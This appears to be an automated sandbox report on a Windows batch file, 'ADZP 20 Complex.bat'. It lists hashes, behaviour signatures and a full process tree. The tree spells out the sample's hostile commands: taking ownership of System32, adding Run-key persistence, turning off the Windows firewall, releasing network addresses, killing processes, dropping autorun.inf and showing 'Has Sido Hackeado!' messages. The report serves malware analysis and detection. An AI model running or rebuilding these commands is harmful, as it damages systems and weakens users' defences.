Analysis
-
max time kernel
8s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
25-05-2024 23:57
Static task
static1
Behavioral task
behavioral1
Sample
ADZP 20 Complex.bat
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
ADZP 20 Complex.bat
Resource
win10v2004-20240508-en
General
-
Target
ADZP 20 Complex.bat
-
Size
17KB
-
MD5
591700c81fbd38cf8c83092030536c14
-
SHA1
a122ca4b91ec2275400e10f21093c43186391c97
-
SHA256
29415d32850d821d9854bfd6edabee920052e0920e6eceec187ea57b8a3c707e
-
SHA512
ae3e1ffef5a82016f13fe728a8a3f2696ed55cdd9ea60d6e75352d55f95fe71cb09bad02945601d4661818473882cc4fae4493d9125e3803054e69c861a97758
-
SSDEEP
192:Un0iMJWap3ahz9j3E301VaYYATCdhSouXKN:ZJWo3yzHVbYMW
Malware Config
Signatures
-
Modifies Windows Firewall 2 TTPs 3 IoCs
Processes:
netsh.exenetsh.exenetsh.exepid process 8564 netsh.exe 8348 netsh.exe 8512 netsh.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.execmd.execmd.execmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation cmd.exe -
Modifies file permissions 1 TTPs 13 IoCs
Processes:
takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exepid process 8484 takeown.exe 9712 takeown.exe 3996 takeown.exe 6092 takeown.exe 6084 takeown.exe 7528 takeown.exe 9580 takeown.exe 9720 takeown.exe 6028 takeown.exe 9568 takeown.exe 2988 takeown.exe 3592 takeown.exe 6384 takeown.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Twain_20 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Twain_20.cmd" reg.exe -
Drops autorun.inf file 1 TTPs 5 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
Processes:
cmd.exeattrib.execmd.execmd.execmd.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Local\Temp\Autorun.inf cmd.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\Autorun.inf attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\Autorun.inf cmd.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\Autorun.inf cmd.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\Autorun.inf cmd.exe -
Drops file in System32 directory 5 IoCs
Processes:
cmd.execmd.execmd.execmd.exedescription ioc process File opened for modification C:\Windows\System32\Twain_20.dll cmd.exe File created C:\Windows\System32\Twain_20.dll cmd.exe File opened for modification C:\Windows\System32\Twain_20.dll cmd.exe File opened for modification C:\Windows\System32\Twain_20.dll cmd.exe File opened for modification C:\Windows\System32\Twain_20.dll cmd.exe -
Drops file in Windows directory 3 IoCs
Processes:
mspaint.exemspaint.exemspaint.exedescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log mspaint.exe File opened for modification C:\Windows\Debug\WIA\wiatrace.log mspaint.exe File opened for modification C:\Windows\Debug\WIA\wiatrace.log mspaint.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Gathers network information 2 TTPs 13 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exepid process 440 ipconfig.exe 1780 ipconfig.exe 4924 ipconfig.exe 10084 ipconfig.exe 10192 ipconfig.exe 3792 ipconfig.exe 1892 ipconfig.exe 10104 ipconfig.exe 924 ipconfig.exe 10152 ipconfig.exe 9976 ipconfig.exe 6072 ipconfig.exe 6112 ipconfig.exe -
Kills process with taskkill 13 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 4992 taskkill.exe 1868 taskkill.exe 3972 taskkill.exe 5188 taskkill.exe 9812 taskkill.exe 8580 taskkill.exe 4684 taskkill.exe 2344 taskkill.exe 3544 taskkill.exe 7984 taskkill.exe 3828 taskkill.exe 9740 taskkill.exe 10256 taskkill.exe -
Modifies registry class 9 IoCs
Processes:
cmd.exeexplorer.exeexplorer.exeexplorer.execalc.execmd.execalc.execmd.execmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings calc.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings calc.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
mspaint.exemspaint.exemspaint.exepid process 2996 mspaint.exe 2996 mspaint.exe 1688 mspaint.exe 1688 mspaint.exe 3284 mspaint.exe 3284 mspaint.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
takeown.exetaskkill.exedescription pid process Token: SeTakeOwnershipPrivilege 2988 takeown.exe Token: SeDebugPrivilege 4992 taskkill.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
mspaint.exemspaint.exemspaint.exeOpenWith.exeOpenWith.exepid process 2996 mspaint.exe 1688 mspaint.exe 2996 mspaint.exe 2996 mspaint.exe 2996 mspaint.exe 1688 mspaint.exe 1688 mspaint.exe 1688 mspaint.exe 3284 mspaint.exe 3284 mspaint.exe 3284 mspaint.exe 3284 mspaint.exe 972 OpenWith.exe 5096 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 3376 wrote to memory of 1552 3376 cmd.exe cmd.exe PID 3376 wrote to memory of 1552 3376 cmd.exe cmd.exe PID 3376 wrote to memory of 4396 3376 cmd.exe cmd.exe PID 3376 wrote to memory of 4396 3376 cmd.exe cmd.exe PID 3376 wrote to memory of 1776 3376 cmd.exe WScript.exe PID 3376 wrote to memory of 1776 3376 cmd.exe WScript.exe PID 3376 wrote to memory of 1736 3376 cmd.exe cmd.exe PID 3376 wrote to memory of 1736 3376 cmd.exe cmd.exe PID 3376 wrote to memory of 5080 3376 cmd.exe reg.exe PID 3376 wrote to memory of 5080 3376 cmd.exe reg.exe PID 3376 wrote to memory of 1016 3376 cmd.exe reg.exe PID 3376 wrote to memory of 1016 3376 cmd.exe reg.exe PID 3376 wrote to memory of 1892 3376 cmd.exe ipconfig.exe PID 3376 wrote to memory of 1892 3376 cmd.exe ipconfig.exe PID 1736 wrote to memory of 2988 1736 cmd.exe takeown.exe PID 1736 wrote to memory of 2988 1736 cmd.exe takeown.exe PID 3376 wrote to memory of 4992 3376 cmd.exe taskkill.exe PID 3376 wrote to memory of 4992 3376 cmd.exe taskkill.exe PID 3376 wrote to memory of 228 3376 cmd.exe attrib.exe PID 3376 wrote to memory of 228 3376 cmd.exe attrib.exe PID 3376 wrote to memory of 3304 3376 cmd.exe WScript.exe PID 3376 wrote to memory of 3304 3376 cmd.exe WScript.exe PID 3376 wrote to memory of 3096 3376 cmd.exe WScript.exe PID 3376 wrote to memory of 3096 3376 cmd.exe WScript.exe PID 3376 wrote to memory of 5112 3376 cmd.exe WScript.exe PID 3376 wrote to memory of 5112 3376 cmd.exe WScript.exe PID 3376 wrote to memory of 4928 3376 cmd.exe WScript.exe PID 3376 wrote to memory of 4928 3376 cmd.exe WScript.exe PID 3376 wrote to memory of 1568 3376 cmd.exe WScript.exe PID 3376 wrote to memory of 1568 3376 cmd.exe WScript.exe PID 3376 wrote to memory of 4564 3376 cmd.exe WScript.exe PID 3376 wrote to memory of 4564 3376 cmd.exe WScript.exe PID 3376 wrote to memory of 4044 3376 cmd.exe WScript.exe PID 3376 wrote to memory of 4044 3376 cmd.exe WScript.exe PID 3376 wrote to memory of 4576 3376 cmd.exe WScript.exe PID 3376 wrote to memory of 4576 3376 cmd.exe WScript.exe PID 3376 wrote to memory of 3508 3376 cmd.exe WScript.exe PID 3376 wrote to memory of 3508 3376 cmd.exe WScript.exe PID 3376 wrote to memory of 2216 3376 cmd.exe WScript.exe PID 3376 wrote to memory of 2216 3376 cmd.exe WScript.exe PID 3376 wrote to memory of 556 3376 cmd.exe msg.exe PID 3376 wrote to memory of 556 3376 cmd.exe msg.exe PID 3376 wrote to memory of 464 3376 cmd.exe explorer.exe PID 3376 wrote to memory of 464 3376 cmd.exe explorer.exe PID 3376 wrote to memory of 2732 3376 cmd.exe Conhost.exe PID 3376 wrote to memory of 2732 3376 cmd.exe Conhost.exe PID 3376 wrote to memory of 1580 3376 cmd.exe cmd.exe PID 3376 wrote to memory of 1580 3376 cmd.exe cmd.exe PID 3376 wrote to memory of 2712 3376 cmd.exe notepad.exe PID 3376 wrote to memory of 2712 3376 cmd.exe notepad.exe PID 3376 wrote to memory of 8 3376 cmd.exe WScript.exe PID 3376 wrote to memory of 8 3376 cmd.exe WScript.exe PID 3376 wrote to memory of 2668 3376 cmd.exe WScript.exe PID 3376 wrote to memory of 2668 3376 cmd.exe WScript.exe PID 3376 wrote to memory of 2996 3376 cmd.exe mspaint.exe PID 3376 wrote to memory of 2996 3376 cmd.exe mspaint.exe PID 3376 wrote to memory of 1524 3376 cmd.exe cmd.exe PID 3376 wrote to memory of 1524 3376 cmd.exe cmd.exe PID 3376 wrote to memory of 4744 3376 cmd.exe notepad.exe PID 3376 wrote to memory of 4744 3376 cmd.exe notepad.exe PID 3376 wrote to memory of 468 3376 cmd.exe calc.exe PID 3376 wrote to memory of 468 3376 cmd.exe calc.exe PID 3376 wrote to memory of 1132 3376 cmd.exe explorer.exe PID 3376 wrote to memory of 1132 3376 cmd.exe explorer.exe -
Views/modifies file attributes 1 TTPs 13 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 12776 attrib.exe 1632 attrib.exe 7668 attrib.exe 5580 attrib.exe 1280 attrib.exe 7288 attrib.exe 10096 attrib.exe 12880 attrib.exe 228 attrib.exe 4656 attrib.exe 5824 attrib.exe 10112 attrib.exe 5600 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"1⤵
- Checks computer location settings
- Drops autorun.inf file
- Drops file in System32 directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f2⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f2⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release2⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*2⤵
- Drops autorun.inf file
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"2⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado2⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado2⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"2⤵
- Checks computer location settings
- Drops autorun.inf file
- Drops file in System32 directory
- Modifies registry class
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat3⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r4⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f3⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f3⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release3⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f3⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*3⤵
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado3⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado3⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat4⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r5⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release4⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f4⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*4⤵
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado4⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado4⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\calc.execalc4⤵
-
C:\Windows\explorer.exeexplorer.exe4⤵
-
C:\Windows\system32\mspaint.exemspaint.exe4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\notepad.exenotepad3⤵
-
C:\Windows\system32\calc.execalc3⤵
-
C:\Windows\explorer.exeexplorer.exe3⤵
-
C:\Windows\system32\mspaint.exemspaint.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\system32\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat4⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r5⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release4⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f4⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*4⤵
- Views/modifies file attributes
-
C:\Windows\system32\notepad.exenotepad3⤵
-
C:\Windows\system32\calc.execalc3⤵
-
C:\Windows\explorer.exeexplorer.exe3⤵
-
C:\Windows\system32\mspaint.exemspaint.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat4⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r5⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release4⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f4⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*4⤵
- Views/modifies file attributes
-
C:\Windows\system32\notepad.exenotepad3⤵
-
C:\Windows\system32\calc.execalc3⤵
-
C:\Windows\explorer.exeexplorer.exe3⤵
-
C:\Windows\system32\mspaint.exemspaint.exe3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\system32\notepad.exenotepad2⤵
-
C:\Windows\system32\calc.execalc2⤵
- Modifies registry class
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies registry class
-
C:\Windows\system32\mspaint.exemspaint.exe2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"2⤵
- Checks computer location settings
- Drops autorun.inf file
- Drops file in System32 directory
- Modifies registry class
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd3⤵
-
C:\Windows\system32\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"4⤵
- Adds Run key to start application
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat3⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r4⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f3⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f3⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release3⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f3⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*3⤵
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado3⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado3⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
